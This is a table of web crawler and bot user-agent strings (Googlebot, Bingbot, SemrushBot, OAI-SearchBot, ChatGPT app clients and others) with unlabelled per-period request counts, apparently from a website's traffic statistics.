| Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 | 0 | 0 | 0 | 0 | 6 | 4 | 4 | 4 | 227 | 182 | 179 | 7 | 9 | 197 | 10 | 4 | 3 | 64 | 8 | 11 | 105 | 1 |

| Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com) | 13 | 17 | 16 | 12 | 16 | 24 | 22 | 25 | 70 | 19 | 25 | 30 | 36 | 34 | 36 | 30 | 40 | 34 | 28 | 42 | 35 | 10 |

| Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) | 20 | 33 | 27 | 47 | 25 | 39 | 19 | 27 | 23 | 26 | 25 | 24 | 32 | 29 | 25 | 31 | 33 | 28 | 31 | 34 | 17 | 19 |

| Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 39 | 52 | 72 | 31 | 62 | 68 | 52 | 52 | 105 | 58 | 8 | 0 | 0 | 0 |

| Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html) | 2 | 0 | 0 | 6 | 1 | 0 | 18 | 3 | 21 | 32 | 21 | 18 | 56 | 35 | 52 | 17 | 32 | 187 | 11 | 40 | 20 | 3 |

| Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) | 34 | 56 | 35 | 294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot) | 14 | 0 | 1 | 5 | 18 | 12 | 5 | 0 | 38 | 89 | 43 | 3 | 5 | 8 | 11 | 12 | 7 | 10 | 3 | 84 | 17 | 2 |

| Mozilla/5.0 (compatible; MJ12bot/v2.0.4; http://mj12bot.com/) | 31 | 46 | 37 | 23 | 21 | 21 | 30 | 21 | 56 | 40 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) | 0 | 0 | 0 | 0 | 119 | 52 | 94 | 27 | 5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 | 0 | 2 | 3 | 4 | 7 | 2 | 0 | 66 | 79 | 69 | 32 |

| Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot | 12 | 12 | 11 | 11 | 12 | 14 | 14 | 14 | 14 | 12 | 12 | 11 | 5 | 14 | 14 | 11 | 15 | 9 | 15 | 15 | 17 | 2 |

| Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot | 4 | 1 | 2 | 7 | 5 | 2 | 4 | 77 | 106 | 0 | 0 | 31 | 9 | 14 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Googlebot-Image/1.0 | 9 | 10 | 4 | 69 | 14 | 10 | 15 | 8 | 12 | 4 | 8 | 4 | 10 | 13 | 4 | 10 | 5 | 1 | 6 | 10 | 10 | 0 |

| Mozilla/5.0 (compatible; MJ12bot/v2.0.5; http://mj12bot.com/) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 17 | 16 | 26 | 14 | 11 | 19 | 22 | 15 | 17 | 21 | 27 | 2 |

| Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot) | 7 | 1 | 1 | 1 | 3 | 3 | 3 | 7 | 4 | 3 | 9 | 4 | 12 | 16 | 14 | 9 | 15 | 22 | 15 | 20 | 21 | 5 |

| Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot) | 4 | 5 | 2 | 8 | 7 | 4 | 1 | 15 | 18 | 22 | 20 | 0 | 0 | 3 | 1 | 2 | 1 | 1 | 0 | 8 | 20 | 21 |

| Googlebot/2.1 (+http://www.google.com/bot.html) | 6 | 7 | 6 | 7 | 5 | 7 | 6 | 27 | 6 | 7 | 6 | 4 | 5 | 7 | 7 | 4 | 8 | 0 | 9 | 5 | 16 | 1 |

| DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html) | 4 | 2 | 3 | 0 | 6 | 4 | 0 | 8 | 8 | 3 | 4 | 10 | 20 | 9 | 7 | 14 | 0 | 15 | 13 | 7 | 11 | 4 |

| Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4 | 0 | 4 | 4 | 4 | 2 | 2 | 0 | 6 | 84 | 6 | 0 |

| Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/) | 10 | 16 | 4 | 4 | 4 | 0 | 0 | 6 | 6 | 0 | 3 | 3 | 2 | 4 | 2 | 7 | 2 | 2 | 3 | 21 | 2 | 2 |

| Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.109 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 58 | 18 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html) | 0 | 0 | 16 | 5 | 0 | 5 | 0 | 8 | 10 | 2 | 0 | 0 | 1 | 2 | 2 | 0 | 1 | 1 | 1 | 2 | 2 | 1 |

| Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) | 1 | 0 | 1 | 7 | 1 | 11 | 1 | 1 | 3 | 1 | 3 | 0 | 6 | 4 | 4 | 2 | 2 | 3 | 2 | 0 | 2 | 0 |

| Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/) | 2 | 0 | 0 | 4 | 3 | 0 | 0 | 2 | 10 | 0 | 1 | 4 | 0 | 2 | 3 | 4 | 0 | 2 | 5 | 4 | 3 | 0 |

| Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 22 | 0 | 0 | 2 | 0 | 0 | 22 | 0 |

| Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot) | 9 | 0 | 0 | 0 | 0 | 13 | 9 | 0 | 0 | 0 | 0 | 0 | 5 | 0 | 0 | 0 | 0 | 0 | 4 | 0 | 0 | 0 |

| Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler) | 4 | 2 | 0 | 0 | 13 | 0 | 4 | 0 | 0 | 8 | 1 | 1 | 4 | 2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.169 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) | 0 | 0 | 0 | 0 | 33 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 21 | 3 | 3 | 0 |

| Mozilla/5.0 (compatible; crawler) | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 | 5 | 8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |

| Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) | 0 | 13 | 10 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |

| Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html) | 0 | 0 | 0 | 3 | 1 | 4 | 0 | 0 | 0 | 2 | 2 | 1 | 2 | 0 | 0 | 2 | 2 | 0 | 0 | 2 | 2 | 0 |

| Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/100.0.4896.127 Safari/537.36 | 0 | 0 | 0 | 0 | 0 | 2 | 8 | 4 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 3 | 2 | 1 | 0 |

| Mozilla/5.0 (compatible; BacklinksExtendedBot) | 0 | 0 | 0 | 0 | 0 | 4 | 0 | 4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4 | 4 | 0 | 2 | 0 | 1 | 0 |

| ZoominfoBot (zoominfobot at zoominfo dot com) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 | 0 | 0 | 0 | 0 | 5 | 3 | 2 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/142.0.0.0 Safari/537.36 | 16 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36 | 0 | 0 | 0 | 0 | 0 | 3 | 4 | 0 | 4 | 0 | 0 | 0 | 0 | 0 | 2 | 1 | 0 | 1 | 0 | 1 | 0 | 0 |

| Mozilla/5.0 (compatible; Bingbot/2.0; +http://www.bing.com/bingbot.htm) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 15 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (compatible; IbouBot/1.0; +bot@ibou.io; +https://ibou.io/iboubot.html) | 13 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (compatible; Website-info.net-Robot; https://website-info.net/robot) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4 | 0 | 0 | 0 | 0 | 0 | 9 | 0 | 0 | 0 | 0 | 0 |

| SEMrushBot | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 3 | 0 | 0 | 0 | 2 | 3 | 0 |

| DnBCrawler-Analytics | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 | 0 | 0 | 6 | 0 | 0 | 0 |

| Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 | 2 | 1 | 0 | 2 | 2 | 3 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (compatible; Pinterestbot/1.0; +http://www.pinterest.com/bot.html) | 0 | 0 | 6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 | 0 | 1 |

| Pandalytics/2.0 (https://domainsbot.com/pandalytics/) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4 | 0 | 0 | 0 | 4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4 | 0 |

| DomainStatsBot/1.0 (https://domainstats.com/pages/our-bot) | 6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/144.0.7559.132 Safari/537.36 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| 2ip bot/1.1 (+https://2ip.io) | 0 | 0 | 0 | 0 | 0 | 0 | 6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 | 0 |

| CCBot/2.0 (https://commoncrawl.org/faq/) | 0 | 0 | 0 | 0 | 0 | 5 | 0 | 0 | 0 | 0 | 0 | 0 | 4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.4 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.4 facebookexternalhit/1.1 Facebot Twitterbot/1.0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 4 | 0 |

| Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/145.0.7632.116 Safari/537.36 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 5 | 0 | 0 | 2 | 0 | 0 | 0 |

| Mozilla/5.0 (compatible; BingIndexCrawler/1.0) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 | 0 | 0 | 1 | 0 | 3 | 1 | 1 | 0 | 0 | 0 |

| Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Perplexity-User/1.0; +https://perplexity.ai/perplexity-user) | 0 | 2 | 3 | 0 | 0 | 2 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (compatible; Timpibot/0.8; +http://www.timpi.io) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 4 | 0 |

| Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/143.0.7499.192 Safari/537.36 | 0 | 0 | 0 | 0 | 0 | 3 | 0 | 0 | 4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| RecordedFuture Global Inventory Crawler | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 | 0 | 0 |

| Timpibot/1.0 (+http://timpi.io/crawler) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 4 | 0 |

| Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ShapBot/0.1.0 | 0 | 2 | 0 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 | 0 | 0 | 0 | 0 |

| Mozilla/4.0 (compatible; fluid/0.0; +http://www.leak.info/bot.html) | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |

| Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Flyriverbot/1.1 (+https://www.flyriver.com/; AI Content Source Check) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 2 | 0 | 0 | 0 | 1 | 0 | 0 |

| Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| OI-Crawler/Nutch (https://openintel.nl/webcrawl/) | 0 | 0 | 0 | 0 | 0 | 5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) | 0 | 0 | 0 | 0 | 0 | 2 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (compatible; MojeekBot/0.11; +https://www.mojeek.com/bot.html) | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |

| Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 2 | 1 |

| ChatGPT/1.2026.006 (Mac OS X 26.2; arm64; build 1768086529) | 0 | 0 | 0 | 0 | 0 | 0 | 3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| ChatGPT/1.2026.006 (iOS 26.2; iPhone18,1; build 20885802981) | 0 | 0 | 0 | 0 | 0 | 3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| ChatGPT/1.2026.048 (Mac OS X 26.3; arm64; build 1771630681) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| ChatGPT/1.2026.055 (iOS 26.3.1; iPhone14,7; build 22511128209) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 | 0 | 0 | 0 |

| GoogleBot/2.1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |

| Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.169 Mobile Safari/537.36 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) | 0 | 0 | 0 | 0 | 3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (bot, like Gecko) Chrome/140.0.7339.210 Safari/537.36 | 0 | 0 | 0 | 3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (adaptive-bot) | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Nicecrawler/1.1; +http://www.nicecrawler.com/) Chrome/90.0.4430.97 Safari/537.36 | 0 | 0 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| ChatGPT/1.2025.350 (iOS 26.2; iPhone17,2; build 20387701780) | 0 | 0 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| ChatGPT/1.2025.358 (iOS 26.1; iPhone18,2; build 20738352061) | 0 | 0 | 0 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| ChatGPT/1.2025.358 (iOS 26.2; iPhone14,7; build 20738352061) | 0 | 0 | 0 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| ChatGPT/1.2026.027 (iOS 18.7.2; iPad11,3; build 21538455626) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| ChatGPT/1.2026.041 (Mac OS X 26.3; arm64; build 1771039076) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| DuckAssistBot/1.2; (+http://duckduckgo.com/duckassistbot.html) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 |

| Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) | 0 | 0 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (compatible; FinepdfsBot/1.0) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 (compatible; SaaSBrowserBot/1.0; +https://saasbrowser.com/bot) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/141.0.7390.122 Safari/537.36 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Scrapy/2.13.4 (+https://scrapy.org) | 0 | 0 | 0 | 0 | 0 | 2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| yacybot (/global; amd64 Linux 5.10.0-13-amd64; java 24.0.2; Etc/en) https://yacy.net/bot.html | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 | 0 | 0 |

| ChatGPT/1.2025.328 (Windows_NT 10.0.26200; x86_64; build ) Electron/37.4.0 Chrome/138.0.7204.243 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| ChatGPT/1.2025.350 (Android 15; SM-A356E; build 2535707) | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| ChatGPT/1.2025.350 (Android 16; 24129PN74C; build 2535024) | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| ChatGPT/1.2026.013 (iOS 26.2.1; iPhone16,2; build 21084174615) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| ChatGPT/1.2026.013 (iOS 26.2; iPhone18,1; build 21084174615) | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| ChatGPT/1.2026.027 (Mac OS X 26.2; arm64; build 1769832365) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| ChatGPT/1.2026.027 (iOS 18.7.3; iPad15,4; build 21538455626) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| ChatGPT/1.2026.027 (iOS 26.2.1; iPhone15,4; build 21538455626) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| ChatGPT/1.2026.034 (iOS 18.6.2; iPhone14,5; build 21772720773) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| ChatGPT/1.2026.041 (Android 14; 100146663; build 2604114) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| ChatGPT/1.2026.041 (Mac OS X 26.2; arm64; build 1771039076) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| ChatGPT/1.2026.055 (Android 13; Nokia G21; build 2605516) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |

| ChatGPT/1.2026.055 (Android 16; SM-M346B; build 2605516) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |

| Facebot | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

| Googlebot/2.1 ( http://www.googlebot.com/bot.html) | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |

